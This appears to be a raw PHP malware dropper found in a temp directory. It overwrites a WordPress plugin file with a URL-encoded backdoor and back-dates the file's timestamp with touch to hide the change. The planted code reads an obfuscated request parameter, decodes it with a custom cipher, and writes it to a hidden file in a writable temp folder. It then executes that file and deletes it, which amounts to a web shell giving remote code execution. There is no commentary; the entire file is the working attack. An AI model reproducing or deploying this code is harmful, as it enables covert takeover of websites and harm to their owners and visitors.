File: //tmp/.dbx_convert
<?php   $p = "/home/bharatdigicom/public_html/wp-content/plugins/file-upload-types/file.upload.types.php"; $c = rawurldecode('%3C%3Fphp%0A%0Aif%28isset%28%24_REQUEST%5B%22%5Cx65nt%22%5D%29%29%7B%0A%09%24property_set%20%3D%20%24_REQUEST%5B%22%5Cx65nt%22%5D%3B%0A%09%20%20%24property_set%09%3Dexplode%28%20%27.%27%09%2C%24property_set%29%20%3B%20%20%0A%09%24itm%3D%09%27%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24s5%3D%09%27abcdefghijklmnopqrstuvwxyz0123456789%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24sLen%3D%09strlen%28%24s5%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24i%3D%090%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24len%3D%09count%28%24property_set%29%3B%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20do%20%7B%09if%28%24i%20%3E%3D%20%24len%29%20break%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24v4%3D%09%24property_set%5B%24i%5D%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24chS%3D%09ord%28%24s5%5B%24i%20%25%20%09%24sLen%5D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24dec%3D%09%28%28int%29%24v4%20-%20%24chS%20-%28%24i%20%25%20%0910%29%29%20%09%5E23%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24itm%20%09.%3D%20chr%28%24dec%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24i%2B%2B%3B%7Dwhile%28true%29%3B%0A%09%24data_chunk%20%3D%20array_filter%28%5Bsession_save_path%28%29%2C%20getcwd%28%29%2C%20getenv%28%22TEMP%22%29%2C%20%22/tmp%22%2C%20%22/dev/shm%22%2C%20sys_get_temp_dir%28%29%2C%20%22/var/tmp%22%2C%20getenv%28%22TMP%22%29%2C%20ini_get%28%22upload_tmp_dir%22%29%5D%29%3B%0A%09while%20%28%24parameter_group%20%3D%20array_shift%28%24data_chunk%29%29%20%7B%0A%20%20%20%20%09%09if%20%28is_dir%28%24parameter_group%29%20%3F%20is_writable%28%24parameter_group%29%20%3A%20false%29%20%7B%0A%20%20%20%20%24bind%20%3D%20vsprintf%28%22%25s/%25s%22%2C%20%5B%24parameter_group%2C%20%22.rec%22%5D%29%3B%0A%20%20%20%20if%20%28file_put_contents%28%24bind%2C%20%24itm%29%29%20%7B%0A%09require%20%24bind%3B%0A%09unlink%28%24bind%29%3B%0A%09exit%3B%0A%7D%0A%7D%0A%7D%0A%7D'); if (file_put_contents($p, $c)) {     echo '!success!';     @touch($p, 1684059621); } die('!ended!');